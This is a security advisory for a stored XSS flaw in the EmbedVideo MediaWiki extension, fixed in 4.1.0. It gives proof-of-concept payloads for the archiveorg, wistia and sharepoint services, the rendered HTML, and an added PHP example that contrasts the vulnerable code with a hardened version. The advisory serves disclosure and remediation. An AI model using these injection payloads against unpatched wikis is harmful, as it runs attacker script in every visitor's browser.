GHSA-5c7p-g73q-rpg5

Source
https://github.com/advisories/GHSA-5c7p-g73q-rpg5
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/06/GHSA-5c7p-g73q-rpg5/GHSA-5c7p-g73q-rpg5.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-5c7p-g73q-rpg5
Aliases
  • CVE-2026-55692
Published
2026-06-19T21:41:57Z
Modified
2026-06-19T21:45:19.324172668Z
Severity
  • 7.5 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Summary
StarCitizenWiki Extension Embed Video: Stored XSS via malformed src url with $wgEmbedVideoRequireConsent enabled
Details

Summary

With $wgEmbedVideoRequireConsent enabled (the default), the video URL is stored in a JSON-encoded data attribute, data-mw-iframeconfig, on the rendered figure element. When given a malformed URL or id containing a single quote, the attribute's delimiter is terminated, allowing HTML/JavaScript injection.

Details

The sprintf call that builds the figure element inserts the iframe config, encoded as JSON, into the data-mw-iframeconfig attribute. When given a malicious URL or id containing a single quote, the $this->getUrl() call returns an unescaped payload; the quote terminates the data-mw-iframeconfig attribute and the remainder of the payload is parsed as further attributes, including event handlers, on the figure element. The id regex for the archiveorg service and the URL regexes for the wistia and sharepoint services all allow single quotes through.

PoC

Examples across three affected services:

Input:
<embedvideo service="archiveorg" id="x' onmouseover='alert(document.domain)' data-x='"></embedvideo>

Renders:


<figure class="embedvideo" data-service="archiveorg" data-mw-iframeconfig="{&quot;src&quot;:&quot;//archive.org/embed/x" onmouseover="alert(document.domain)" data-x="?autoplay=1&quot;}" style="width:640px">
<div class="embedvideo-wrapper" style="height:493px"><div class="embedvideo-consent" data-show-privacy-notice="1">
...
</div>
</figure>

Input:
{{#ev:wistia|https://wistia.com/medias/x'onmouseover='alert(document.domain)'}}

Renders:


<figure class="embedvideo" data-service="wistia" data-mw-iframeconfig="{&quot;src&quot;:&quot;//fast.wistia.net/embed/iframe/x" onmouseover="alert(document.domain)" ?autoplay="1&quot;}'" style="width:640px">
<div class="embedvideo-wrapper" style="height:360px"><div class="embedvideo-consent" data-show-privacy-notice="1">
...
</div>
</figure>

Input:
{{#ev:sharepoint|https://a.sharepoint.com/sites/x'onmouseover='alert(document.domain)'.aspx}}

Impact

Under the default $wgEmbedVideoRequireConsent = true configuration, any user able to edit a page can inject arbitrary JavaScript into an HTML event handler attribute on the figure element via the id or URL parameter. Because whole attributes are injected, the handler can be chosen so that no user interaction is needed (e.g. onfocus paired with autofocus), and it executes in the wiki's origin for every visitor to the page.
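The mechanism described under Details and the no-interaction variant noted under Impact, as an added example that is not code from the EmbedVideo extension: it models a sprintf that drops a JSON-encoded iframe config into a single-quoted data attribute, shows the PoC payload breaking out of it, and places a hardened version beside it. The element and attribute names follow the rendered output above; the two id regexes, the helper names and the hardening approach are assumptions for this illustration, and the page does not show how 4.1.0 actually fixes the issue.

```php
<?php
// Added example, not the extension's code. Models the vulnerable pattern:
// iframe config JSON-encoded into a single-quoted attribute via sprintf,
// with src built from an id that a permissive regex let through.
// The wrapper/consent child elements from the real output are omitted.

// Assumed stand-in for the permissive service regex: anything non-empty
// on one line passes, so a single quote (and spaces) survive.
const ID_REGEX_PERMISSIVE = '/^.+$/';
// Assumed allowlist of the characters an archive.org item id needs.
const ID_REGEX_STRICT = '/^[A-Za-z0-9_.\-]+$/';

function buildSrc(string $id): string {
    return '//archive.org/embed/' . $id . '?autoplay=1';
}

// Vulnerable: json_encode() leaves single quotes alone and nothing escapes
// the JSON for the attribute context, so a ' in $id closes
// data-mw-iframeconfig and the rest of the payload becomes attributes.
function renderVulnerable(string $id): ?string {
    if (!preg_match(ID_REGEX_PERMISSIVE, $id)) {
        return null;
    }
    $json = json_encode(['src' => buildSrc($id)], JSON_UNESCAPED_SLASHES);
    return sprintf(
        "<figure class='embedvideo' data-service='archiveorg' data-mw-iframeconfig='%s'></figure>",
        $json
    );
}

// Hardened (assumed approach, not necessarily the 4.1.0 fix): reject ids
// outside the allowlist, and escape the JSON for the attribute context with
// ENT_QUOTES so neither quote style can terminate the attribute.
function renderHardened(string $id): ?string {
    if (!preg_match(ID_REGEX_STRICT, $id)) {
        return null;
    }
    $json = json_encode(['src' => buildSrc($id)], JSON_UNESCAPED_SLASHES);
    return sprintf(
        "<figure class='embedvideo' data-service='archiveorg' data-mw-iframeconfig='%s'></figure>",
        htmlspecialchars($json, ENT_QUOTES | ENT_HTML5, 'UTF-8')
    );
}

// A well-formed opening tag here carries three attribute values, so exactly
// six single quotes; any other count means payload quotes reached markup.
function attributeBroken(string $html): bool {
    preg_match('/<figure[^>]*>/', $html, $m);
    return substr_count($m[0], "'") !== 6;
}

// Constructed payloads: the PoC's onmouseover variant and the
// no-interaction onfocus/autofocus variant noted under Impact.
$payloads = [
    "x' onmouseover='alert(document.domain)' data-x='",
    "x' onfocus='alert(document.domain)' autofocus='",
];

foreach ($payloads as $id) {
    $vuln = renderVulnerable($id);
    printf("vulnerable: %s\n  injected: %s\n", $vuln, var_export(attributeBroken($vuln), true));
    $safe = renderHardened($id);
    printf("hardened:   %s\n", $safe === null ? 'rejected by allowlist' : $safe);
}
// A benign id passes the strict allowlist and renders with intact quoting.
$benign = renderHardened('abc123');
printf("benign:     %s\n  injected: %s\n", $benign, var_export(attributeBroken($benign), true));
```

Run it with `php example.php`. The vulnerable branch reproduces the structure of the rendered figure above (the browser's DOM serializer is what turns the raw single-quoted attribute into the double-quoted form shown there). In a MediaWiki extension the idiomatic route to the same context-aware escaping is to build the element with Html::element() or Html::rawElement() and pass the JSON as an attribute value rather than interpolating it into a format string; the allowlist on the id is a second, independent layer, since output encoding alone already closes the attribute break-out.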

Database specific
{
    "nvd_published_at": null,
    "github_reviewed_at": "2026-06-19T21:41:57Z",
    "github_reviewed": true,
    "severity": "HIGH",
    "cwe_ids": [
        "CWE-79",
        "CWE-80"
    ]
}
References

Affected packages

Packagist / starcitizenwiki/embedvideo

Package

Name
starcitizenwiki/embedvideo
Purl
pkg:composer/starcitizenwiki%2Fembedvideo

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0 (unknown introduced version; all previous versions are affected)
Fixed
4.1.0

Affected versions

3.*
3.0.0
3.0.1
3.0.2
3.0.3
3.0.4
3.0.5
3.0.6
3.0.7
3.0.8
3.0.9
3.1.0
3.2.0
3.2.1
3.2.2
3.2.3
3.2.4
3.2.5
3.2.6
3.2.7
3.2.8
3.3.0
3.4.0
3.4.1
3.4.2
3.4.3
4.*
4.0.0

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/06/GHSA-5c7p-g73q-rpg5/GHSA-5c7p-g73q-rpg5.json"
last_known_affected_version_range
"<= 4.0.0"